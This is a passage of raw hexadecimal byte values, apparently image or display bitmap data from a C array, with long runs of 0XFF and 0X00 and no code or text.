0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFE,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFE,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X80,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X80,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
